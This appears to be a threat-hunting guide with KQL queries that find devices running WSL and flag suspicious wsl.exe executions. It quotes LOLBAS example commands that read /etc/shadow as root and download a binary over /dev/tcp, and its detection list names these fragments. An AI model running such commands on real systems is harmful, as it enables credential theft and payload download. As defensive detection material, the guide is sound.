Windows Subsystem for Linux (WSL) may be used by adversaries to perform actions as root or to download files. This query lists all devices that have WSL installed and on which it was active in the last 30 days, which gives an indication of WSL usage in your environment. Microsoft recommends block-listing WSL (see the recommended block rules below) if there is no scenario that explicitly requires it. wsl.exe should be located at C:\Windows\System32\wsl.exe. From the LOLBAS project, some suspicious commands that can be executed via WSL are:
```cmd
wsl.exe -u root -e cat /etc/shadow
wsl.exe --system calc.exe
wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'
```
- https://learn.microsoft.com/en-us/windows/wsl/
- https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/
- https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
```kql
let WSLDevices = DeviceProcessEvents
| where Timestamp > ago(30d)
| where FileName == "wsl.exe"
| distinct DeviceId;
DeviceInfo
| where DeviceId in (WSLDevices)
| summarize arg_max(Timestamp, *) by DeviceId
```
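The inventory query above only tells you which devices run WSL. As an added example (not part of the original query), the following KQL goes one step further and surfaces the individual wsl.exe executions worth triaging: those whose command line matches the LOLBAS patterns listed above, and those where the binary does not run from the expected C:\Windows\System32 location. It uses only standard DeviceProcessEvents columns; the `SuspiciousArgs` list is constructed here from the commands on this page and is an assumption you should tune for your environment (note that Store-installed WSL lives under C:\Program Files\WindowsApps, so the path check may need an allow-list there).

```kql
// Added example: triage wsl.exe executions, not just WSL presence.
// Argument fragments taken from the LOLBAS commands on this page (assumption: tune per environment).
let SuspiciousArgs = dynamic(["-u root", "--system", "--exec", "/dev/tcp/", "/etc/shadow"]);
DeviceProcessEvents
| where Timestamp > ago(30d)
| where FileName =~ "wsl.exe"
// Expected location per the text above is C:\Windows\System32\wsl.exe;
// FolderPath is compared case-insensitively by startswith.
| extend UnexpectedPath = FolderPath !startswith @"C:\Windows\System32\"
| extend SuspiciousCommandLine = ProcessCommandLine has_any (SuspiciousArgs)
| where SuspiciousCommandLine or UnexpectedPath
| project Timestamp, DeviceId, DeviceName, AccountName, FolderPath, ProcessCommandLine,
          InitiatingProcessFileName, InitiatingProcessCommandLine,
          SuspiciousCommandLine, UnexpectedPath
| order by Timestamp desc
```

Run this after the inventory query: a device that appears in the inventory but never in this result set is a candidate for the block rule, while hits here (especially `-u root` or `/dev/tcp/` launched from an office application or script host) should go to incident response.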